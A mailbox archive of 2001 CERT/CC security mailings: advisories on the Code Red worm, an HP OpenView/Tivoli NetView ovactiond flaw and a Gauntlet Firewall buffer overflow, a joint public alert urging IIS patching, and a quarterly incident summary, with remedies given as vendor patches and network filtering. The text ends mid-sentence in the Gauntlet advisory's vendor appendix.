iQCVAwUBO18P/QYcfu8gsZJZAQH2XAP/dFPRLX4MGRYxKSc67J+hRclhijxGIFn+ Jo7M4jWb2GeImjxdzRO5bbqGHUfV7Jm7gjXRdIdBTJuK0xIN2tdGjdp3/kEbaWE7 oqise1azNitAWSn2pEaVXidHyY3wm3ed5XHKZmShU/5PXGoa/avhnXqRrv7p/yup hBWgsoeBiLI= =WuU+ -----END PGP SIGNATURE----- From - Fri Jul 27 08:43:30 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f6R4HsD09859; Thu, 26 Jul 2001 21:17:54 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id VAA02275; Thu, 26 Jul 2001 21:26:23 -0400 (EDT) Date: Thu, 26 Jul 2001 21:26:23 -0400 (EDT) Received: by canaveral.red.cert.org; Thu, 26 Jul 2001 21:18:48 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-23 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 22affac9cfdaa0956630c4324a15ec25 Status: RO X-Status: X-Keywords: X-UID: 17 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-23 Continued Threat of the "Code Red" Worm Original release date: July 26, 2001 Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Microsoft Windows NT 4.0 with IIS 4.0 or IIS 5.0 enabled and Index Server 2.0 installed * Windows 2000 with IIS 4.0 or IIS 5.0 enabled and Indexing services installed * Cisco CallManager, Unity Server, uOne, ICS7750, Building Broadband Service Manager (these systems run IIS) * Unpatched Cisco 600 series DSL routers Overview Since around July 13, 2001, at least two variants of the self-propagating malicious code "Code Red" have been attacking hosts on the Internet (see CA-2001-19 "Code Red" Worm Exploiting Buffer Overflow In IIS Indexing Service DLL). Different organizations who have analyzed "Code Red" have reached different conclusions about the behavior of infected machines when their system clocks roll over to the next month. We believe the worm will begin propagating again on August 1, 2001 0:00 GMT, and there is evidence that tens of thousands of systems are already infected or vulnerable to re-infection at that time. Because the worm propagates very quickly, it is likely that nearly all vulnerable systems will be compromised by August 2, 2001. The CERT/CC has received reports indicating that at least 280,000 hosts were compromised in the first wave. I. Description The "Code Red" worm is malicious self-propagating code that exploits Microsoft Internet Information Server (IIS)-enabled systems susceptible to the vulnerability described in CA-2001-13 Buffer Overflow In IIS Indexing Service DLL. Its activity on a compromised machine is time senstive; different activity occurs based on the date (day of the month) of the system clock. The CERT/CC is aware of at least two major variants of the worm, each of which exhibits the following pattern of behavior: * Propagation mode (from the 1st - 19th of the month): The infected host will attempt to connect to TCP port 80 of randomly chosen IP addresses in order to further propagate the worm. Depending on the configuration of the host that receives this request, there are varied consequences. + Unpatched IIS 4.0 and 5.0 servers with Indexing service installed will almost certainly be compromised by the "Code Red" worm. In the earlier variant of the worm, victim hosts with a default language of English experienced a defacement on all pages requested from the web server. Hosts infected with the later variant did not experience any change in the served content. + Unpatched Cisco 600-series DSL routers will process the HTTP request and trigger an unrelated vulnerability that causes the router to stop forwarding packets. [http://www.cisco.com/warp/public/707/cisco-code-red-worm-pub .shtml] + Systems not running IIS, but with an HTTP server listening on TCP port 80 will probably accept the HTTP request, return with an "HTTP 400 Bad Request" message, and potentially log this request in an access log. * Flood mode (from the 20th - 27th of the month): A packet-flooding denial-of-service attack will be launched against a specific IP address embedded in the code. * Termination (after the 27th day): The worm remains in memory but is otherwise inactive. Detailed technical analysis of the "Code Red" worm can be found in http://www.cert.org/advisories/CA-2001-19.html II. Impact Data reported to the CERT/CC indicates that the "Code Red" worm infected more than 250,000 sytems in just 9 hours. Figure 1 illustrates the activity between 6:00 AM EDT and 8:00 PM EDT on July 19, 2001. [See Figure 1 at http://www.cert.org/advisories/CA-2001-23.html] NOTE: After 8:00 PM EDT on July 19 (0:00 GMT July 20), the worm switched into flood mode on most infected systems, so the number of infected systems remained fairly constant after that time. Our analysis estimates that starting with a single infected host, the time required to infect all vulnerable IIS servers with this worm could be less than 18 hours. Since the worm is programmed to continue propagating for the first 19 days of the month, widespread denial of service may result due to heavy scan traffic. As reported in CA-2001-19, infected systems may experience web site defacement as well as performance degradation as a result of the propagating activity of this worm. This degradation can become quite severe, and in fact may cause some services to stop entirely, since it is possible for a machine to be infected with multiple copies of the worm simultaneously. Furthermore, it is important to note that the IIS indexing vulnerability that the "Code Red" worm exploits can be used to execute arbitrary code in the Local System security context. This level of privilege effectively gives an attacker complete control of the infected system. III. Solutions The CERT/CC encourages all Internet sites to review CA-2001-13 and ensure workarounds or patches have been applied on all affected hosts on your network. If you believe a host under your control has been compromised, you may wish to refer to http://www.cert.org/tech_tips/win-UNIX-system_compromise.html Known versions of the worm reside entirely in memory; therefore, a reboot of the machine will purge the worm from the system. However, due to the rapid propagation of the worm, the likelihood of re-infection is quite high. Taking the system offline and applying the vendor patch will eliminate the vulnerability exploited by the "Code Red" worm. IV. Good Practices Consistent with the security best-practice of denying all network traffic and only selectively allowing that which is required, ingress and egress filtering should be implemented at the network edge. Likewise, controls must be in place to ensure that all software used on a network is properly maintained. Ingress filtering Ingress filtering manages the flow of traffic as it enters a network under your administrative control. Servers are typically the only machines that need to accept inbound connections from the public Internet. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound connections to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound connections to non-authortized services. In this fashion, the effectiveness of many intruder scanning techniques can be dramatically reduced. With "Code Red," ingress filtering will prevent instances of the worm outside of your network from infecting machines in the local network that are not explicitly authorized to provide public web services. Egress filtering Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound connections to the Internet. In the case of "Code Red," employing egress filtering will prevent compromised IIS servers on your network from further propagating the worm. Installing new software with the latest patches When installing an operating system or application on a host for the first time, it is insufficient to merely use the install media. Vulnerabilities are often discovered after the software becomes widely distributed. Thus, prior to connecting this host to the network, the latest security patches for the software should be obtained from the vendor and applied. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Cisco Systems Cisco has published a security advisory describing this vulnerability at http://www.cisco.com/warp/public/707/cisco-code-red-worm-pub.sh tml Microsoft Corporation The following document regarding the vulnerability exploited by the "Code Red" worm is available from Microsoft: http://www.microsoft.com/technet/security/bulletin/MS01-033.asp ______________________________________________________________________ Author(s): Roman Danyliw and Allen Householder ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-23.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History Jul 26, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO2DBMwYcfu8gsZJZAQH8+AP8DjgCfr3pdIA4YeMG+B9F3Ko2iL108d9f YA3662PWBMFQcQAhAaAd7+iAUOPmVSENZ8fqc6MGt9guis72J4kmGjBBUoKIqQ3Z foV9TZUyZSi56e+q/GEq7hVtTn23MYh/n4tttvhnmrRqKe6biGwjS3PMu11KZqeK RBlRqNc4ItA= =hvKD -----END PGP SIGNATURE----- From - Sun Jul 29 14:03:33 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f6TL2rJ11447; Sun, 29 Jul 2001 14:02:53 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA11752; Sun, 29 Jul 2001 16:24:48 -0400 (EDT) Date: Sun, 29 Jul 2001 16:24:48 -0400 (EDT) Received: by canaveral.red.cert.org; Sun, 29 Jul 2001 16:17:41 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: Public Alert about the Code Red worm X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 36e0e43c7d3e76d4b7396415323a0447 Status: RO X-Status: X-Keywords: X-UID: 18 -----BEGIN PGP SIGNED MESSAGE----- We the CERT/CC, along with other organizations listed below are jointly publishing this alert about a serious threat to the Internet For Immediate Release: 3:00 PM EDT July 29, 2001 A Very Real and Present Threat to the Internet: July 31 Deadline For Action Summary: The Code Red Worm and mutations of the worm pose a continued and serious threat to Internet users. Immediate action is required to combat this threat. Users who have deployed software that is vulnerable to the worm (Microsoft IIS Versions 4.0 and 5.0) must install, if they have not done so already, a vital security patch. How Big Is The Problem? On July 19, the Code Red worm infected more than 250,000 systems in just 9 hours. The worm scans the Internet, identifies vulnerable systems, and infects these systems by installing itself. Each newly installed worm joins all the others causing the rate of scanning to grow rapidly. This uncontrolled growth in scanning directly decreases the speed of the Internet and can cause sporadic but widespread outages among all types of systems. Code Red is likely to start spreading again on July 31st, 2001 8:00 PM EDT and has mutated so that it may be even more dangerous. This spread has the potential to disrupt business and personal use of the Internet for applications such as electronic commerce, email and entertainment. Who Must Act? Every organization or person who has Windows NT or Windows 2000 systems AND the IIS web server software may be vulnerable. IIS is installed automatically for many applications. If you are not certain, follow the instructions attached to determine whether you are running IIS 4.0 or 5.0. If you are using Windows 95, Windows 98, or Windows Me, there is no action that you need to take in response to this alert. What To Do If You Are Vulnerable? a. To rid your machine of the current worm, reboot your computer. b. To protect your system from re-infection: Install Microsoft?s patch for the Code Red vulnerability problem: * Windows NT version 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833 * Windows 2000 Professional, Server and Advanced Server: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800 Step-by-step instructions for these actions are posted at www.digitalisland.com/codered Microsoft's description of the patch and its installation, and the vulnerability it addresses is posted at: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-033.asp Because of the importance of this threat, this alert is being made jointly by: Microsoft The National Infrastructure Protection Center Federal Computer Incident Response Center (FedCIRC) Information Technology Association of America (ITAA) CERT Coordination Center SANS Institute Internet Security Systems Internet Security Alliance -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBO2RpCgYcfu8gsZJZAQGFrAP/TzyQ7lyshdKb7XeNNaVTFAZzO1hB1vKG CZsaPxzqF2/GMgAQJ8HNum43QBSzr+H96f/5c7Op9ac1SefzuyWs14z+BhBXr6mf Io9vClcL3h9saqV/J1Bkv0psYhhImTgLvAWZIYneYMuvY39zjxLC2/jkKLw8dWze lcdFPH5j9vE= =3biQ -----END PGP SIGNATURE----- From - Wed Aug 15 12:47:43 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id f7FJjrN15164; Wed, 15 Aug 2001 12:45:53 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA24049; Wed, 15 Aug 2001 14:10:05 -0400 (EDT) Date: Wed, 15 Aug 2001 14:10:05 -0400 (EDT) Received: by canaveral.red.cert.org; Wed, 15 Aug 2001 14:04:54 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-24 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 642f1bd4300c5792ca727cb6e0579d72 Status: RO X-Status: X-Keywords: X-UID: 19 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-24 Vulnerability in OpenView and NetView Original release date: August 15, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Systems running HP OpenView Network Node Manager (NNM) Version 6.1 on the following platforms: * HP9000 Servers running HP-UX releases 10.20 and 11.00 (only) * Sun Microsystems Solaris releases 2.x * Microsoft Windows NT4.x / Windows 2000 * Systems running Tivoli NetView Versions 5.x and 6.x on the following platforms: * IBM AIX * Sun Microsystems Solaris * Compaq Tru64 Unix * Microsoft Windows NT4.x / Windows 2000 Overview ovactiond is a component of OpenView by Hewlett-Packard Company (HP) and NetView by Tivoli, an IBM Company (Tivoli). These products are used to manage large systems and networks. There is a serious vulnerability in ovactiond that allows intruders to execute arbitrary commands with elevated privileges. This may subsequently lead to an intruder gaining administrative control of a vulnerable machine. I. Description ovactiond is the SNMP trap and event handler for both OpenView and NetView. There is a vulnerability in ovactiond that allows an intruder to execute arbitrary commands by sending a malicious message to the management server. These commands run with the privileges of the ovactiond process, which varies according to the operating system. OpenView version 6.1 is vulnerable in the default configuration. Versions prior to 6.1 are not vulnerable in the default configuration, but there are public reports that versions prior to 6.1 may be vulnerable if users have made customizations to the trapd.conf file. On June 21, 2001, HP released a security bulletin (HP SB #154) and a patch for this vulnerability in OpenView version 6.1. For more information, see http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985 http://www.kb.cert.org/vuls/id/952171 Tivoli NetView versions 5.x and 6.x are not vulnerable with the default configuration. It is, however, likely that customized configurations are vulnerable. This security vulnerability only exists if an authorized user configures additional event actions and specifies potentially destructive varbinds (those of type string or opaque). Tivoli has developed a patch for versions 5.x and 6.x. The patch addresses the vulnerability in ovactiond, as well as taking preventative measures on other components specific to NetView. Tivoli has published information on this vulnerability at http://www.tivoli.com/support/ II. Impact An intruder can execute arbitrary commands with the privileges of the ovactiond process. On UNIX systems, ovactiond typically runs as user bin; on Windows systems it typically runs in the Local System security context. On Windows NT systems, this allows an intruder to gain administrative control of the underlying operating system. On UNIX systems, an intruder may be able to leverage bin access to gain root access. Additionally, systems running these products often have trust relationships with other network devices. An intruder who compromises these systems may be able to leverage this trust to compromise other devices on the network or to make changes to the network configuration. III. Solution Apply a patch Appendix A contains information provided by vendors for this advisory. We will update the appendix as we receive more information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact your vendor directly. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apple Mac OS X and Mac OS X Server do not have this vulnerability. Computer Associates Computer Associates has completed a review of all Unicenter functions and processing related to SNMP traps as indicated by the advisory. Unicenter is not subject to the same vulnerabilities as demonstrated by the SNMP trap managers identified by CERT (i.e., OpenView and NetView). CA Unicenter does not formulate commands determined through trap data parsing. Unicenter implements this technology using different methods and thereby avoids this exposure. Computer Associates maintains strong relationships with these vendors and recommends that clients running any environments containing either of these products visit the website URLs specifically identified by the CERT Coordination Center. FreeBSD FreeBSD does not use this code. Fujitsu Regarding VU#952171, Fujitsu's UXP/V operating system is not affected because there's no implementation of any OpenView Technology in UXP/V. Hewlett-Packard On June 21, 2001, HP released a security bulletin (HP SB #154) and a patch for this vulnerability in OpenView version 6.1. For more information, see http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985 http://www.kb.cert.org/vuls/id/952171 Microsoft NNM is a third-party application as far as our platform is concerned. We don't have any special relationship with it. HP would need to provide the patches. Tivoli Tivoli acknowledges that certain user customizations to Tivoli NetView may lead to a potential security exposure. Please reference http://www.tivoli.com/support/ for further information and to obtain an e-fix which addresses the issue. References 1. http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985 2. http://www.tivoli.com/support/ 3. http://www.securityfocus.com/bid/2845 4. http://www.kb.cert.org/vuls/id/952171 _________________________________________________________________ The CERT Coordination Center thanks Milo G. van der Zee for notifying us about this problem, and Tivoli and Hewlett-Packard for other information used in the construction of this advisory. _________________________________________________________________ Feedback on this document can be directed to the authors, Jason A. Rafail and Shawn Hernan. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-24.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History August 15, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO3q31wYcfu8gsZJZAQFhagP+N9mcuI14o8ykvy3FhiAm40F5YhycO+ik z1uLdlKkzen+x5EDaQ/amkFu8S8sIvB3iyu1DbB+GmxAHKQHzBGnnC6sJAqU3dYp XpaSCUGX6tW8mfjaogaZVUaENh21Wtj/lVa0sbG9GD+FmAZdgebEM59OoOY+vkRZ xGCSnS9TBtQ= =gBbI -----END PGP SIGNATURE----- From - Tue Aug 28 10:11:27 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id f7SH8rF12457; Tue, 28 Aug 2001 10:08:53 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id LAA19410; Tue, 28 Aug 2001 11:12:26 -0400 (EDT) Date: Tue, 28 Aug 2001 11:12:26 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 28 Aug 2001 11:06:36 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2001-03 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: d64a13a2b92e5c2fad58c48e11fe551f Status: RO X-Status: X-Keywords: X-UID: 20 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2001-03 August 28, 2001 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in May 2001 (CS-2001-02), we have seen several self-propagating worms, as well as active exploitation of vulnerabilities in Solaris in.lpd, BSD telnet daemon and Microsoft IIS by intruders. In addition, we have seen an increase in intruder activity directed at home users. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. "Code Red" / "Code Red II" worms On June 19, 2001, the CERT/CC published CERT Advisory CA-2001-13, describing a vulnerability in Indexing Services used by Microsoft IIS 4.0 and IIS 5.0 running on Windows NT, Windows 2000, and beta versions of Windows XP. This vulnerability allows a remote intruder to run arbitrary code on the victim machine. On July 19, 2001, the CERT/CC began receiving a large number of reports of a worm commonly referred to as "Code Red". The widespread, automated attack and propagation characteristics of this worm, and its variants, have caused bandwidth denial-of-service conditions in isolated portions of the Internet, particularly near groups of compromised hosts. Since that time, we have received reports of variants, as well as reports of another worm with similiar characteristics (Code Red II). These worms have affected at least 300,000 hosts. The CERT/CC highly encourages administrators of IIS servers to review the following documents and take appropriate action. CERT Advisory CA-2001-13: Buffer Overflow In IIS Indexing Service DLL http://www.cert.org/advisories/CA-2001-13.html CERT Advisory CA-2001-19: "Code Red" Worm Exploiting Buffer Overflow in IIS Indexing Service DLL http://www.cert.org/advisories/CA-2001-19.html CERT Advisory CA-2001-23: Continuing Threat of the "Code Red" Worm http://www.cert.org/advisories/CA-2001-23html CERT Incident Note IN-2001-08: "Code Red" Worm Exploiting Buffer Overflow in IIS Indexing Service DLL http://www.cert.org/incident_notes/IN-2001-08.html CERT Incident Note IN-2001-09: "Code Red II:" Another Worm Exploiting Buffer Overflow in IIS Indexing Service DLL http://www.cert.org/incident_notes/IN-2001-09.html 2. "Code Red" Worm Crashes IIS 4.0 Servers with URL Redirection Enabled Along with the large number of "Code Red" and "Code Red II" reports indicating that systems are compromised, the CERT/CC has received a smaller yet still significant number of reports where Windows NT 4.0 IIS 4.0 systems have been adversely affected by the high volume of "Code Red" scanning activity. A recently discovered vulnerability can cause an IIS 4.0 server (patched against "Code Red" according to Microsoft Security Bulletin MS01-033) with URL redirection enabled to crash when scanned by the "Code Red" worm. CERT Incident Note IN-2001-10: "Code Red" Worm Crashes IIS 4.0 Servers with URL Redirection Enabled http://www.cert.org/incident_notes/IN-2001-10.html 3. W32/Sircam Malicious Code "W32/Sircam" is malicious code that spreads through email and potentially through unprotected Windows network shares. Once the malicious code has been executed on a system, it may reveal or delete sensitive information. Detailed information about W32/Sircam can be found in CERT Advisory CA-2001-22. Users are strongly encouraged to visit their anti-virus vendor's website for information on how to properly remove W32/Sircam from an infected computer. CERT Advisory CA-2001-22: W32/Sircam Malicious Code http://www.cert.org/advisories/CA-2001-22.html 4. Buffer Overflow in telnetd The telnetd program is a server for the Telnet remote virtual terminal protocol. There is a remotely exploitable buffer overflow in Telnet daemons derived from BSD source code. This vulnerability can crash the server or be leveraged to gain root access. CERT Advisory CA-2001-21: Buffer Overflow in telnetd http://www.cert.org/advisories/CA-2001-21.html 5. Buffer Overflow in Sun Solaris in.lpd Print Daemon A buffer overflow exists in the Solaris BSD-style line printer daemon, in.lpd, that may allow a remote intruder to execute arbitrary code with the privileges of the running daemon. CERT Advisory CA-2001-15: Buffer Overflow in Sun Solaris in.lpd Print Daemon http://www.cert.org/advisories/CA-2001-15.html 6. Continuing Threats to Home Users The CERT/CC has observed a significant increase in activity resulting in compromises of home user machines. Many home users do not keep their machines up to date with security patches and workarounds, do not run current anti-virus software, and do not exercise caution when handling email attachments. Intruders know this, and we have seen a marked increase in intruders specifically targeting home users who have cable modem and DSL connections. The CERT/CC strongly encourages home users to review the below referenced documents. These documents illustrate the threats to home users, and outline countermeasures that can be used to mitigate aganist them. CERT Advisory CA-2001-20: Continuing Threats to Home Users http://www.cert.org/advisories/CA-2001-20.html CERT Tech Tip: Home Network Security http://www.cert.org/tech_tips/home_networks.html 7. W32/Leaves The CERT/CC has received a number of reports regarding the compromise of home user machines running Microsoft Windows. Most of these reports surround the intruder tool SubSeven. SubSeven is often used as a Trojan horse, which allows an intruder to deliver and execute any custom payload and run arbitrary commands on the affected machine. CERT Incident Note IN-2001-07: W32/Leaves: Exploitation of previously installed SubSeven Trojan Horses http://www.cert.org/incident_notes/IN-2001-07.html _________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Congressional Testimony http://www.cert.org/congressional_testimony/ * Incident Notes http://www.cert.org/incident_notes/ * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Tech Tips http://www.cert.org/tech_tips/ * Training Schedule http:/www.cert.org/training/ ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2001-03.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO4uyaQYcfu8gsZJZAQFJEgP6A0+vfi/vkpl5YeneQPhyfllaFEtKwQSD xuGWHF6YUQGEHiQZYnwAFV2gWEkY5OGLWGBSsRESr3kHSpcMPfsOkGvty+lyi5aM kfRaZkkdlZdNmMYlxwQxq9IrEaWX4rJzrzcdfq9U3TTB4oBJnP4dDRyUIdW3Oe3E R8vDJQar7EM= =DR64 -----END PGP SIGNATURE----- From - Thu Sep 6 18:47:41 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id f871g2E19970; Thu, 6 Sep 2001 18:42:02 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id TAA29535; Thu, 6 Sep 2001 19:36:13 -0400 (EDT) Date: Thu, 6 Sep 2001 19:36:13 -0400 (EDT) Received: by canaveral.red.cert.org; Thu, 6 Sep 2001 19:31:12 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-25 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: ba1012075afad244ff05a6b896aec3b8 Status: RO X-Status: X-Keywords: X-UID: 21 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-25 Buffer Overflow in Gauntlet Firewall allows intruders to execute arbitrary code Original release date: September 06, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Systems running the following products that use Gauntlet Firewall * Gauntlet for Unix versions 5.x * PGP e-ppliance 300 series version 1.0 * McAfee e-ppliance 100 and 120 series * Gauntlet for Unix version 6.0 * PGP e-ppliance 300 series versions 1.5, 2.0 * PGP e-ppliance 1000 series versions 1.5, 2.0 * McAfee WebShield for Solaris v4.1 Overview A vulnerability for a remotely exploitable buffer overflow exists in Gauntlet Firewall by PGP Security. I. Description The buffer overflow occurs in the smap/smapd and CSMAP daemons. According to PGP Security, these daemons are responsible for handling email transactions for both inbound and outbound email. On September 04, 2001, PGP Security released a security bulletin and patches for this vulnerability. For more information, please see http://www.pgp.com/support/product-advisories/csmap.asp http://www.pgp.com/naicommon/download/upgrade/upgrades-patch.asp http://www.kb.cert.org/vuls/id/206723 II. Impact An intruder can execute arbitrary code with the privileges of the corresponding daemon. Additionally, firewalls often have trust relationships with other network devices. An intruder who compromises a firewall may be able to leverage this trust to compromise other devices on the network or to make changes to the network configuration. III. Solution Apply a patch Appendix A contains information provided by vendors for this advisory. We will update the appendix as we receive more information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact your vendor directly. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their 